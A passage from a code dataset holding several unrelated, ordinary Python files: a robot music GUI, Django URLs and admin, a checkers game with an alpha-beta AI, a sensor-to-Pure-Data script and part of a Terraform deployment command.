ttk.Frame(window, padding=10, borderwidth=5, relief='ridge')\n frame.grid()\n\n frame_lable = ttk.Label(frame, text='Maestro Bot')\n songs_button = ttk.Button(frame, text='Play built in songs')\n tempo_lable = ttk.Label(frame, text='tempo')\n\n dropdown = ttk.Combobox(frame)\n dropdown['values'] = ('Sans Undertale', 'All Star', 'Mobamba')\n dance_button = ttk.Button(frame, text='Dance')\n compose_music = ttk.Button(frame, text='Compose Music')\n read_music = ttk.Button(frame, text='Read Music')\n dame_tu_cosita = ttk.Button(frame, text='Dame tu Cosita')\n\n bpm_dance_box = ttk.Entry(frame, width='8')\n tempo_box = ttk.Entry(frame, width='8')\n times_box = ttk.Entry(frame, width='8')\n times_dance_box = ttk.Entry(frame, width='8')\n\n frame_lable.grid(row=0, column=0)\n songs_button.grid(row=1, column=0)\n dropdown.grid(row=1, column=1)\n times_box.grid(row=1, column=2)\n dance_button.grid(row=2, column=0)\n times_dance_box.grid(row=2, column=2)\n bpm_dance_box.grid(row=2, column=1)\n compose_music.grid(row=3, column=0)\n read_music.grid(row=4, column=0)\n tempo_lable.grid(row=4, column=1)\n tempo_box.grid(row=4, column=2)\n\n dance_button['command'] = lambda : handle_dance(bpm_dance_box, times_dance_box, mqtt_sender)\n read_music['command'] = lambda : handle_read_music(tempo_box, mqtt_sender)\n compose_music['command']=lambda : handle_write_music(mqtt_sender)\n dame_tu_cosita['command'] = lambda : handle_dame_tu_cosita(mqtt_sender)\n songs_button['command'] = lambda : handle_play_prebuilt_music(dropdown.current(), times_box, mqtt_sender)\n\n return frame\n\n\ndef handle_play_prebuilt_music(song, times, mqtt_sender):\n print('Playing song', song, times.get(), 'times')\n mqtt_sender.send_message('play_prebuilt_music', [int(song), int(times.get())])\n\ndef handle_dance(tempo, times, mqtt_sender):\n print('Dancing at ', tempo.get(), 'bpm', times.get(), 'times')\n mqtt_sender.send_message('dance', [int(tempo.get()), int(times.get())])\n\ndef handle_read_music(tempo, mqtt_sender):\n print('Reading music')\n mqtt_sender.send_message('read_music', [int(tempo.get())])\n\ndef handle_write_music(mqtt_sender):\n print('Writing Music')\n mqtt_sender.send_message('write_music', [])\n\ndef handle_dame_tu_cosita(mqtt_sender):\n print('Calling dame tu cosita at 3 AM')\n mqtt_sender.send_message('dame_tu_cosita', [])\n\ndef handle_find_object_ir(freq, rate, mqtt_sender):\n print('Finding object', freq.get(), rate.get())\n mqtt_sender.send_message('m2_find_object_ir', [int(freq.get()), int(rate.get())])\n\ndef handle_find_object_camera(freq, rate, clockwise, mqtt_sender):\n print('Spinning and the finding object', freq.get(), rate.get(), clockwise)\n mqtt_sender.send_message('m2_find_object_camera', [int(freq.get()), int(rate.get()), int(clockwise)])\n\n\n\n# -----------------------------------------------------------------------------\n# Calls main to start the ball rolling.\n# -----------------------------------------------------------------------------\nmain()","sub_path":"src/m2_run_this_on_laptop.py","file_name":"m2_run_this_on_laptop.py","file_ext":"py","file_size_in_byte":8473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"550239233","text":"from .views import show_item,show_checkout,show_order,get_category,search,homepage,reciept,contact,how_it_works_page,maintence,restaurant_list\nfrom django.conf.urls.defaults import patterns, include, url\n\n\nurlpatterns = patterns('',\n#\turl(r'^$',maintence,name=\"maintenance\"),\n#\turl(r'^$',homepage,name=\"homepage\"),\n url(r'^$',restaurant_list,name=\"restaurant_list\"),\n\turl(r'^menu/(\\d+)$',get_category, name=\"f4l_menu\"),\n\turl(r'^your_order/(?P\\d+)/$',show_order,name=\"order_index\"),\n\turl(r'^item/(?P\\d+)/$',show_item, name=\"item_order\"),\n\turl(r'^checkout/(?P\\d+)/$',show_checkout,name=\"checkout\"),\n\turl(r'^reciept/$',reciept,name=\"checkout_reciept\"),\n\turl(r'^search_results/$',search,name=\"search\"),\n\turl(r'^contact/$',contact,name=\"contact_us\"),\n#\turl(r'^how_it_works/$',how_it_works_page,name=\"how_it_works\"),\n\turl(r'^captcha/',include('captcha.urls')),\n\n#\turl(r'^homepage$',homepage,name=\"homepage\"),\n#\turl(r'^form/$',tryout_form,name=\"tryout\")\n # url(r'^search/(\\d+)$',search,name=\"search\"),\n)\n#urlpatterns += patterns('/^item/',url(r'^$', show_item, name = \"item_order\"),)\n","sub_path":"live/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"388783528","text":"'''\nCreated on 07/10/2015\n\n@author: vitorcunha\n'''\nimport unittest\nimport os.path\n\nfrom editor_grafico import EditorGrafico\n\nclass Test(unittest.TestCase):\n \n e = EditorGrafico()\n\n# def testCmdI(self):\n# img = self.e.cmdI(5, 6)\n# assert len(img) == 5\n# assert len(img[0]) == 6\n# \n# \n# def testCmdC(self):\n# img = self.e.cmdC()\n# for linha in img:\n# for c in linha:\n# assert str(c) == '0'\n# \n# \n# def testCmdL(self):\n# img = self.e.cmdL(2,3, 'A')\n# assert img[2][3] == 'A'\n# \n# def testCmdS(self):\n# fname = \"one.bmp\"\n# img = self.e.cmdS(fname);\n# assert os.path.isfile(fname) \n# \n# def testCmdV(self):\n# pass\n\n \n def testEntrada1(self):\n self.e.cmdI(5,6)\n self.e.cmdL(2,3, 'A')\n self.e.cmdS(\"one.bmp\")\n self.e.cmdP()\n \n self.e.cmdV( 2, 3, 4, 'W')\n self.e.cmdH( 3, 4, 2, 'Z')\n self.e.cmdF( 3, 3, 'J')\n self.e.cmdS(\"two.bmp\")\n \n self.e.cmdP()\n\n def testEntrada2(self):\n self.e.cmdI(10,9)\n self.e.cmdL(5,3, 'A')\n self.e.cmdV(2,3, 4, 'W')\n self.e.cmdH(1, 10,5, 'Z')\n self.e.cmdF(3,3, 'J')\n self.e.cmdK(2,7, 8,8, 'E')\n self.e.cmdF(9,9, 'R')\n self.e.cmdP()\n \n def testCmdF(self):\n self.e.cmdI(5,5)\n self.e.cmdF(3,3, 'A')\n\n \n","sub_path":"editor/editor_test.py","file_name":"editor_test.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"130973566","text":"from django.contrib import admin\nfrom django.contrib.auth.models import Group\nfrom django.db.models import Count, Q\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom trix.trix_core import models as coremodels\n\n\ndef set_administrators(modeladmin, request, queryset):\n queryset.update(is_admin=True)\nset_administrators.short_description = _(\"Give admin access to the selected users\")\n\n\ndef unset_administrators(modeladmin, request, queryset):\n queryset.update(is_admin=False)\nunset_administrators.short_description = _(\"Remove admin access from the selected users\")\n\n\nclass UserAdmin(admin.ModelAdmin):\n list_display = [\n 'email',\n 'is_admin',\n 'last_login',\n ]\n search_fields = ['email']\n list_filter = [\n 'is_admin',\n 'last_login',\n ]\n fields = ['email', 'is_admin']\n readonly_fields = ['last_login']\n actions = [set_administrators, unset_administrators]\n\nadmin.site.register(coremodels.User, UserAdmin)\n\n\n# class AssignmentAdmin(admin.ModelAdmin):\n# list_display = (\n# 'title',\n# 'get_tags',\n# 'created_datetime',\n# 'lastupdate_datetime',\n# )\n# search_fields = ['title', 'tags__tag']\n# filter_horizontal = ['tags']\n# list_filter = [\n# 'created_datetime',\n# 'lastupdate_datetime',\n# 'tags',\n# ]\n#\n# def get_tags(self, course):\n# return u','.join(tag.tag for tag in course.tags.all())\n# get_tags.short_description = 'Tags'\n#\n# def get_queryset(self, request):\n# queryset = super(AssignmentAdmin, self).get_queryset(request)\n# queryset = queryset.prefetch_related('tags')\n# return queryset\n#\n#\n# admin.site.register(coremodels.Assignment, AssignmentAdmin)\n\n\nclass TagInUseFilter(admin.SimpleListFilter):\n title = _('tag is in use')\n parameter_name = 'tag_is_in_use'\n\n def lookups(self, request, model_admin):\n return (\n ('yes', _('Yes')),\n ('no', _('No')),\n )\n\n def queryset(self, request, queryset):\n if self.value() == 'yes':\n return queryset.filter(\n Q(assignment__count__gt=0) |\n Q(active_period_set__count__gt=0) |\n Q(course_set__count__gt=0)\n )\n if self.value() == 'no':\n return queryset.filter(\n Q(assignment__count=0) &\n Q(active_period_set__count=0) &\n Q(course_set__count=0)\n )\n\n\nclass TagAdmin(admin.ModelAdmin):\n search_fields = ['tag']\n list_display = [\n 'tag',\n 'category',\n 'get_assignment_count',\n 'is_in_use'\n ]\n list_filter = [TagInUseFilter]\n\n def get_queryset(self, request):\n return super(TagAdmin, self).get_queryset(request)\\\n .annotate(\n Count('assignment', distinct=True),\n Count('active_period_set', distinct=True),\n Count('course_set', distinct=True))\n\n def get_assignment_count(self, tag):\n return unicode(tag.assignment__count)\n get_assignment_count.short_description = _('Number of assignments')\n get_assignment_count.admin_order_field = 'assignment__count'\n\n def is_in_use(self, tag):\n return (tag.assignment__count + tag.active_period_set__count + tag.course_set__count) > 0\n is_in_use.short_description = _('Is in use')\n is_in_use.boolean = True\n\nadmin.site.register(coremodels.Tag, TagAdmin)\n\n\nclass CourseAdmin(admin.ModelAdmin):\n list_display = (\n 'course_tag',\n 'active_period',\n 'get_admins',\n\n )\n search_fields = [\n 'course_tag__tag',\n 'description',\n 'active_period__tag',\n ]\n filter_horizontal = ['admins']\n raw_id_fields = ['course_tag', 'active_period']\n\n def get_admins(self, course):\n return u','.join(unicode(user) for user in course.admins.all())\n get_admins.short_description = 'Admins'\n\n def get_queryset(self, request):\n queryset = super(CourseAdmin, self).get_queryset(request)\n queryset = queryset\\\n .select_related('course_tag', 'active_period')\\\n .prefetch_related('admins')\n return queryset\n\nadmin.site.register(coremodels.Course, CourseAdmin)\n\n\n# class PermalinkAdmin(admin.ModelAdmin):\n# list_display = (\n# 'course',\n# 'title',\n# 'get_tags',\n# )\n# search_fields = [\n# 'tags__tag',\n# 'title',\n# 'description',\n# 'course__course_tag__tag',\n# ]\n# filter_horizontal = ['tags']\n# raw_id_fields = ['course']\n# list_filter = [\n# 'tags',\n# ]\n#\n# def get_tags(self, permalink):\n# return u','.join(tag.tag for tag in permalink.tags.all())\n# get_tags.short_description = 'Tags'\n#\n# def get_queryset(self, request):\n# queryset = super(PermalinkAdmin, self).get_queryset(request)\n# queryset = queryset\\\n# .select_related('course', 'course__course_tag')\\\n# .prefetch_related('tags')\n# return queryset\n\n\n# admin.site.register(coremodels.Permalink, PermalinkAdmin)\n\n# Unregister auth.groups\nadmin.site.unregister(Group)\n","sub_path":"trix/trix_core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"135844379","text":"\n\ndef get_min_swap_count(arr, size_of_array):\n misplaced_count = 0\n gap = int(size_of_array/2)\n\n while gap > 0:\n for i in range(gap, size_of_array):\n temp = arr[i]\n j = i\n while j >= gap and arr[ j - gap] > temp:\n arr[j] = arr[j - gap]\n misplaced_count += 1\n j -= gap\n arr[j] = temp\n gap //= 2\n #print(arr)\n return misplaced_count\n\n\n\nif __name__ == \"__main__\":\n \"\"\"\n https://www.hackerrank.com/challenges/minimum-swaps-2/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=arrays\n \"\"\"\n size_of_array = int(input())\n arr = [int(x) for x in input().split()]\n result = get_min_swap_count(arr, size_of_array)\n print(result)\n'''\n 12 34 52 2 3\n n = 5/2 = 2\n \n 4\n\n \n'''","sub_path":"InterViewPrepKit/Array/Minimum_Swap_2.py","file_name":"Minimum_Swap_2.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"578060587","text":"import sys\nimport pygame as pg\nimport logging\nimport Project_GameState\nfrom settings import *\n\n# What each module does\n# sys - This will set the recursion limit so that algorithms won't run on forever.\n# settings - This will import the settings file in the current directory.\n\n# Importing the GameState which will be used purely as the GUI for the application. As it\n# As it stands right now, we draw the GUI information from a mix of this file and\n# the GameState. In the next update the DisplayState will have more of that responsibility.\nfrom Project_GameState import GameState as DisplayState\n\n# set which version of the GameState you will use for each Player in the game\nfrom Project_GameState import GameState as P1GameState\nfrom Project_GameState import GameState as P2GameState\n\n# set which Player object you will use for each Player in the game\nP1Player = Project_GameState.Player_AlphaBeta(1, 0)\nP2Player = Project_GameState.Player_AlphaBeta(2, 0) # Project_GameState.Player_AlphaBeta(2, 0)\n\n# The basic Checkers class.\nclass Checkers:\n # The init function where we initalize important information about pygame and checkers.\n def __init__(self):\n # print(\"+INITIALIZED77777+\")\n pg.init() # This initializes pygame, must be done.\n pg.display.set_caption(TITLE) # Sets title of the window as defined in settings.\n self.clock = pg.time.Clock() # Used to set the FPS.\n self.display_state = DisplayState(BOARD_ROWS, BOARD_COLS) # Used to display the GUI\n self.width = self.display_state.cols() * TILESIZE # Width of screen.\n self.height = self.display_state.rows() * TILESIZE + 40 # Height of screen.\n self.screen = pg.display.set_mode( (self.width, self.height) ) # Window Size.\n self.font = pg.font.SysFont(FONTNAME, FONTSIZE, bold=FONTBOLD) # Used later.\n self.winner = PLAYER_NONE # Won't need to worry about this for now.\n self.text_position = (10, self.height-35) # Used later.\n self.player_states = [P1GameState(BOARD_ROWS, BOARD_COLS), P2GameState(BOARD_ROWS, BOARD_COLS)]\n self.players = [P1Player, P2Player]\n\n # Variables used to create the checkerboard pattern background.\n self.flip_color = True # Used to switch background colors when drawing the board.\n\n # The main game update loop of the application\n def update(self):\n # This sets a limit on how fast our computers process the drawing code.\\\n self.dt = self.clock.tick(FPS) / 1000\n self.do_turn()\n self.events() # This will check for any input.\n self.draw() # Draw everything on the screen.\n\n # This will draw everything on the screen.\n def draw(self):\n # Add another parameter for king color.\n self.draw_board() # Draw the basic checkerboard for the background.\n\n # Determine if there's a winner.\n player = self.display_state.player_to_move()\n if (self.winner == PLAYER_NONE):\n self.draw_text(PLAYER_NAMES[player] + (\": Human\" if self.players[player] == None else \": AI Thinking\"), self.text_position, PIECECOLOR[player])\n else: \n self.draw_text(GAME_RESULT_STRING[self.winner], self.text_position, PIECECOLOR[self.winner])\n \n self.draw_piece_list(self.screen, self.display_state.red_piece_list, RED, 2) # Draw all the red pieces.\n self.draw_piece_list(self.screen, self.display_state.black_piece_list, BLACK, 2) # Draw all the black pieces.\n\n # If a player has pressed down on a piece then highlight potential moves.\n self.draw_piece_list(self.screen, self.display_state.red_piece_potential_move_list, WHITE, 2) # Draw all potential red moves on board.\n self.draw_piece_list(self.screen, self.display_state.black_piece_potential_move_list, WHITE, 2) # Draw all potential red moves on board.\n pg.display.flip() # Paint the graphics to the screen.\n\n # This will draw the checkered background of the checkers screen.\n def draw_board(self):\n # This must always be reinitialized or else colors will constantly be flashing.\n self.flip_color = True\n self.screen.fill(BG_COLOR_1) # Fill the Background to BG Colour 2.\n \n # Draw all the tiles on the screen.\n # NOTE: We don't use drawrect to create a rectangle but we instead fill the part\n # of the screen(like paintbucket in MS Paint/Photoshop) to fill in the checkerboard\n # design.\n for c in range(self.display_state.cols()):\n for r in range(self.display_state.rows()):\n # Draw a colored tile on the screen depending on flip_color value.\n if (self.flip_color == True):\n self.screen.fill(BG_COLOR_1, (c*TILESIZE, r*TILESIZE, TILESIZE*1, TILESIZE*1))\n self.flip_color = False # Draw the next tile a different color.\n else:\n self.screen.fill(BG_COLOR_2, (c*TILESIZE, r*TILESIZE, TILESIZE*1, TILESIZE*1))\n self.flip_color = True # Draw the next tile a different color.\n\n # Flip the color again so the next column starts with a different color.\n self.flip_color = not self.flip_color \n\n # This will draw a list of pieces on a board using a list of tuples.\n def draw_piece_list(self, surface, piece_list, color, border):\n # For every piece in given list, draw a piece at that row and column.\n for piece in piece_list:\n row, col = self.display_state.rows() - 1 - piece[0], piece[1]\n \n if (piece in self.display_state.red_king_piece_list) or (piece in self.display_state.black_king_piece_list):\n pg.draw.circle(surface, color, (col*TILESIZE+TILESIZE//2, row*TILESIZE+TILESIZE//2), TILESIZE//2-PIECEPAD)\n pg.draw.circle(surface, GOLD, (col*TILESIZE+TILESIZE//2, row*TILESIZE+TILESIZE//2), TILESIZE//2-PIECEPAD, border)\n else:\n pg.draw.circle(surface, color, (col*TILESIZE+TILESIZE//2, row*TILESIZE+TILESIZE//2), TILESIZE//2-PIECEPAD)\n\n # draw some text with the given arguments\n def draw_text(self, text, pos, color):\n label = self.font.render(text, 1, color)\n self.screen.blit(label, pos)\n \n # reset the game to a the default state board\n def reset(self):\n # print(\"Reset\")\n self.winner = PLAYER_NONE\n self.display_state = DisplayState(BOARD_ROWS, BOARD_COLS)\n self.player_states[0] = P1GameState(BOARD_ROWS, BOARD_COLS)\n self.player_states[1] = P2GameState(BOARD_ROWS, BOARD_COLS)\n\n # This will execute a move when passed a new row/column location.\n def do_move(self, move):\n # print(\"about to do move\")\n player = self.display_state.player_to_move()\n # print(\"do move player is \", player)\n # print(\"self.players[player] is \", self.players[player])\n # print(\"move is \", move)\n\n # This if statement is used to change the selected index to the one alpha beta\n # generated when it found the best move.\n if self.players[player] != None:\n # # print(\"AI temp_best_just_done_move is \", self.players[player].temp_best_just_done_move_B)\n # # print(\"AI self.players[player].temp_best_selected_piece is \", self.players[player].temp_best_selected_piece_B)\n # # print(\"AI self.players[player].temp_red_pieces_to_remove_list is \", self.players[player].temp_red_pieces_to_remove_list_B)\n # print(\"move is \", move)\n self.display_state.selected_piece = self.players[player].temp_best_selected_piece_B\n self.player_states[0].selected_piece = self.players[player].temp_best_selected_piece_B\n self.player_states[1].selected_piece = self.players[player].temp_best_selected_piece_B\n\n # Updating the red pieces to remove list.\n self.display_state.red_pieces_to_remove_list = self.players[player].temp_red_pieces_to_remove_list_B\n self.player_states[0].red_pieces_to_remove_list = self.players[player].temp_red_pieces_to_remove_list_B\n self.player_states[1].red_pieces_to_remove_list = self.players[player].temp_red_pieces_to_remove_list_B\n\n # Updating the black pieces to remove list.\n self.display_state.black_pieces_to_remove_list = self.players[player].temp_black_pieces_to_remove_list\n self.player_states[0].black_pieces_to_remove_list = self.players[player].temp_black_pieces_to_remove_list\n self.player_states[1].black_pieces_to_remove_list = self.players[player].temp_black_pieces_to_remove_list\n \n\n # print(\"do move\")\n # Check for winner and do move.\n self.winner = self.display_state.winner()\n self.display_state.do_move(move)\n self.player_states[0].do_move(move)\n self.player_states[1].do_move(move)\n\n # This function will do a basic move\n def do_turn(self):\n # # print(\"do turn\")\n self.winner = self.display_state.winner()\n if self.winner == PLAYER_NONE: # there is no winner yet, so get the next move from the AI\n player = self.display_state.player_to_move() # get the next player to move from the state\n # # print(\"------ \", player)\n if self.players[player] != None: # if the current player is an AI, get its move\n # print(\"About to do turn\")\n \n if (player == 0):\n # NOTE: If both uncommented, program will break.\n # Uncomment out this line if you want a AB move.\n # self.do_move(self.players[player].get_move(self.player_states[player])) # Get an alpha beta move.\n\n # Uncomment out this line if you want a random move\n self.do_move(self.players[player].get_random_move(self.player_states[player])) # Get a random move.\n elif (player == 1):\n # NOTE: If both uncommented, program will break.\n # Uncomment out this line if you want a AB move.\n self.do_move(self.players[player].get_move(self.player_states[player])) # Get an alpha beta move.\n\n # Uncomment out this line if you want a random move\n # self.do_move(self.players[player].get_random_move(self.player_states[player])) # Get a random mov\n \n \n # Returns the tile (r,c) on the grid underneath a given mouse position in pixels\n def get_tile(self, mpos):\n return (mpos[1] // TILESIZE, mpos[0] // TILESIZE)\n\n # This function will handle all user input handling.\n def events(self):\n # Loop through every event occuring.\n for event in pg.event.get():\n # If user hit the X button on window, then quit.\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n \n # Check if a key is pressed down.\n if event.type == pg.KEYDOWN:\n # Reset board to starting state.\n if event.key == pg.K_r: self.reset()\n \n # ALL DEBUGGING STUFF.\n # If left key pressed, move a black piece.\n if event.key == pg.K_LEFT:\n print(\"LEFT\")\n # self.do_move_by_index(self.black_piece_list, 9, LEGAL_BLACK_ACTIONS[1])\n\n # If left key pressed, move a red piece.\n if event.key == pg.K_RIGHT:\n print(\"RIGHT\")\n # self.do_move_by_index(self.red_piece_list, 9, LEGAL_RED_ACTIONS[1])\n\n # If D is pressed down, print debuging information\n if event.key == pg.K_d:\n # print(\"Debugging is cool\")\n player = self.display_state.player_to_move()\n # # print(\"-- random is \", self.players[0].get_random_move(self.player_states[player]))\n # print(\"Display state red pieces are \", self.display_state.red_piece_list)\n\n # Check if a mousebutton is pressed down.\n if event.type == pg.MOUSEBUTTONDOWN:\n if pg.mouse.get_pressed()[0]:\n move = self.get_tile(event.pos)\n repositioned_row = move[0] - (BOARD_ROWS - 1)\n move = (abs(repositioned_row), move[1])\n # print(\"Move pressed is \", move)\n\n red_p_moves = self.display_state.red_piece_potential_move_list\n black_p_moves = self.display_state.black_piece_potential_move_list\n \n # If player clicked on a potential move then go to that postion.\n if ((move in red_p_moves or move in black_p_moves) and self.winner == PLAYER_NONE):\n self.do_move(move)\n continue\n\n # If player didn't click on potential move then show them instead.\n self.display_state.highlight_potential_moves(move)\n self.player_states[0].highlight_potential_moves(move)\n self.player_states[1].highlight_potential_moves(move)\n\n# This is the main executable part of the program.\nsys.setrecursionlimit(10000) # Can't go past 10000 recursive depth.\n\n# This is the basic game object\ngame_object = Checkers()\n\n# This is the \"game loop\" of the program, it is an infinite loop that runs the game.\nwhile True:\n game_object.update()\n \n","sub_path":"Project_main.py","file_name":"Project_main.py","file_ext":"py","file_size_in_byte":13518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"502887313","text":"#! /usr/bin/python\n\nfrom gpiozero import MCP3008\nimport os\nfrom time import sleep\n\ndef send2Pd(message=' '):\n os.system(\"echo '\" + message + \"' | pdsend 3000\");\n\nwhile True:\n with MCP3008(channel=0) as pot1:\n print(pot1.value);\n message1 = '1 ' + str(pot1.value) + ';'\n send2Pd(message1)\n\n #sleep(1)\n \n with MCP3008(channel=1) as pot2:\n print(pot2.value);\n message2 = '2 ' + str(pot2.value) + ';'\n send2Pd(message2)\n\n #sleep(1)\n \n with MCP3008(channel=2) as pot3:\n print(pot3.value);\n message3 = '3 ' + str(pot3.value) + ';'\n send2Pd(message3)\n\n #sleep(1)\n \n with MCP3008(channel=3) as pot4:\n print(pot4.value);\n message4 = '4 ' + str(pot4.value) + ';'\n send2Pd(message4)\n\n sleep(0.02)\n","sub_path":"Volume_Pots/python_to_pi_4_POT_TEST.py","file_name":"python_to_pi_4_POT_TEST.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"330883238","text":"from dataclasses import dataclass\n\nimport boto3\nimport click\nimport itertools\nimport logging\nimport sys\nfrom abc import ABC\nfrom pathlib import Path\nfrom threading import Thread\nfrom time import sleep\nfrom typing import List, Optional\n\nfrom coworks.aws import AwsS3Session\nfrom coworks.coworks import Entry\nfrom .command import CwsCommand, CwsCommandError\nfrom .writer import CwsTemplateWriter\nfrom .zip import CwsZipArchiver\nfrom ..config import CORSConfig\n\nUID_SEP = '_'\n\nlogging.getLogger(\"python_terraform\").setLevel(logging.ERROR)\n\n\n@dataclass\nclass TerraformResource:\n parent_uid: str\n path: str\n entries: List[Entry]\n cors: CORSConfig\n\n @property\n def uid(self):\n def remove_brackets(path):\n return f\"{path.replace('{', '').replace('}', '')}\"\n\n if self.path is None:\n return ''\n\n last = remove_brackets(self.path)\n return f\"{self.parent_uid}{UID_SEP}{last}\" if self.parent_uid else last\n\n @property\n def is_root(self):\n return self.path is None\n\n @property\n def parent_is_root(self):\n return self.parent_uid == ''\n\n def __repr__(self):\n return f\"{self.uid}:{self.entries}\"\n\n\nclass CwsTerraformCommand(CwsCommand, ABC):\n WRITER_CMD = 'export'\n\n @property\n def options(self):\n return [\n *super().options,\n click.option('--memory_size', default=128),\n click.option('--timeout', default=30),\n ]\n\n def __init__(self, app=None, **kwargs):\n self.writer_cmd = self.add_writer_command(app)\n super().__init__(app, **kwargs)\n\n def add_writer_command(self, app):\n \"\"\"Default writer command added if not already defined.\"\"\"\n return app.commands.get(self.WRITER_CMD) or CwsTemplateWriter(app)\n\n @classmethod\n def generate_terraform_files(cls, step, app, terraform, template, filename, msg, **options):\n debug = options['debug']\n profile_name = options['profile_name']\n aws_region = boto3.Session(profile_name=profile_name).region_name\n\n if debug:\n print(msg)\n output = str(Path(terraform.working_dir) / filename)\n app.execute(cls.WRITER_CMD, template=[template], output=output, aws_region=aws_region,\n step=step, api_resources=cls.terraform_api_resources(app), **options)\n\n @classmethod\n def generate_terraform_resources_list_file(cls, app, terraform, filename, msg, **options):\n debug = options['debug']\n profile_name = options['profile_name']\n aws_region = boto3.Session(profile_name=profile_name).region_name\n if not aws_region:\n raise CwsCommandError(\"No region defined for this profile.\")\n\n if debug:\n print(msg)\n output = Path(terraform.working_dir) / filename\n app.execute(cls.WRITER_CMD, template=[\"resources.j2\"], output=str(output), aws_region=aws_region,\n api_resources=cls.terraform_api_resources(app), **options)\n\n return cls.read_terraform_resources_list_file(terraform, filename, **options)\n\n @classmethod\n def read_terraform_resources_list_file(cls, terraform, filename, **options):\n output = Path(terraform.working_dir) / filename\n with output.open('r') as res_file:\n lines = res_file.readlines()[1:]\n return [line[:-1] for line in lines if line.rstrip()]\n\n @staticmethod\n def terraform_api_resources(app):\n \"\"\"Returns the list of flatten path (prev, last, entry).\"\"\"\n resources = {}\n\n def add_entries(previous, last, entries_: Optional[List[Entry]]):\n ter_entry = TerraformResource(previous, last, entries_, app.config.cors)\n uid = ter_entry.uid\n if uid not in resources:\n resources[uid] = ter_entry\n if resources[uid].entries is None:\n resources[uid].entries = entries_\n return uid\n\n for route, entries in app.entries.items():\n previous_uid = ''\n if route.startswith('/'):\n route = route[1:]\n splited_route = route.split('/')\n\n # special root case\n if splited_route == ['']:\n add_entries(None, None, entries)\n continue\n\n # creates intermediate resources\n last_path = splited_route[-1:][0]\n for prev in splited_route[:-1]:\n previous_uid = add_entries(previous_uid, prev, None)\n\n # set entry keys for last entry\n add_entries(previous_uid, last_path, entries)\n\n return resources\n\n\nclass CwsTerraformDeployer(CwsTerraformCommand):\n \"\"\" Deploiement in 4 steps:\n create\n Step 1. Create API in default workspace (destroys API integrations made in previous deployment)\n Step 2. Create Lambda in stage workspace (destroys API deployment made in previous deployment)\n update\n Step 3. Update API routes integrations\n Step 4. Update API deployment\n \"\"\"\n\n ZIP_CMD = 'zip'\n\n @property\n def options(self):\n return [\n *super().options,\n *self.zip_cmd.options,\n click.option('--binary_media_types'),\n click.option('--create', '-c', is_flag=True, help=\"Stop on create step.\"),\n click.option('--dry', is_flag=True, help=\"Doesn't perform deploy [Global option only].\"),\n click.option('--layers', '-l', multiple=True, help=\"Add layer (full arn: aws:lambda:...)\"),\n click.option('--init', '-i', is_flag=True, help=\"Perform terraform initialization.\"),\n click.option('--output', '-o', is_flag=True, help=\"Print terraform output values.\"),\n click.option('--python', '-p', type=click.Choice(['3.7', '3.8']), default='3.8',\n help=\"Python version for the lambda.\"),\n click.option('--update', '-u', is_flag=True, help=\"Only update lambda code [Global option only].\"),\n ]\n\n @classmethod\n def multi_execute(cls, project_dir, workspace, execution_list):\n # Output, dry, create, stop and update are global options\n dry = create = update_lambda_only = output = init = False\n for command, options in execution_list:\n dry = options.pop('dry', False) or dry\n create = options.pop('create', False) or create\n update_lambda_only = options.pop('update', False) or update_lambda_only\n\n # Set default bucket key value\n options['key'] = options['key'] or f\"{options.get('module')}-{command.app.name}/archive.zip\"\n output = output or options.pop('output', False)\n init = init or options.pop('init', False)\n\n terraform = Terraform(init)\n if output: # Stop if only print output\n print(f\"terraform output : {terraform.output()}\", flush=True)\n return\n\n # Transfert zip file to S3 (to be done on each service)\n for command, options in execution_list:\n print(f\"Uploading zip to S3\")\n module_name = options.pop('module_name')\n ignore = options.pop('ignore') or ['.*', 'terraform']\n options.pop('hash')\n command.app.execute(cls.ZIP_CMD, ignore=ignore, module_name=module_name, hash=True, dry=dry, **options)\n\n # Generates default provider\n # cls.generate_common_terraform_files()\n\n # Get all terraform resources\n terraform_api_ressources = []\n for command, options in execution_list:\n terraform_filename = f\"{command.app.name}.{command.app.ms_type}.txt\"\n msg = f\"Generate resources list for {command.app.name}\"\n res = cls.generate_terraform_resources_list_file(command.app, terraform, terraform_filename, msg, **options)\n terraform_api_ressources.extend(res)\n\n # Generates terraform files (create step)\n if not update_lambda_only:\n for command, options in execution_list:\n terraform_filename = f\"{command.app.name}.{command.app.ms_type}.tf\"\n msg = f\"Generate terraform files for creating API and lambdas for {command.app.name}\"\n cls.generate_terraform_files(\"create\", command.app, terraform, \"deploy.j2\", terraform_filename, msg,\n dry=dry, **options)\n\n # Apply terraform if not dry (create API with null resources and lambda step)\n # or in case of only updating lambda code\n if not dry:\n msg = [\"Create or reset API\", f\"Create lambda {workspace}\"]\n cls.terraform_apply(terraform, workspace, terraform_api_ressources, msg)\n\n # Stop on create step if needed\n if create:\n terraform.select_workspace(\"default\")\n return\n\n # Generates terraform files (update step)\n for command, options in execution_list:\n terraform_filename = f\"{command.app.name}.{command.app.ms_type}.tf\"\n msg = f\"Generate terraform files for updating API routes and deploiement for {command.app.name}\"\n cls.generate_terraform_files(\"update\", command.app, terraform, \"deploy.j2\", terraform_filename, msg,\n dry=dry, **options)\n\n # Apply terraform if not dry (update API routes and deploy step)\n if not dry:\n msg = [\"Update API routes\", f\"Deploy API {workspace}\"]\n cls.terraform_apply(terraform, workspace, terraform_api_ressources, msg,\n update_lambda_only=update_lambda_only)\n\n # Traces output\n print(f\"terraform output : {terraform.output()}\", flush=True)\n\n def __init__(self, app=None, name='deploy'):\n self.zip_cmd = self.add_zip_command(app)\n super().__init__(app, name=name)\n\n def add_zip_command(self, 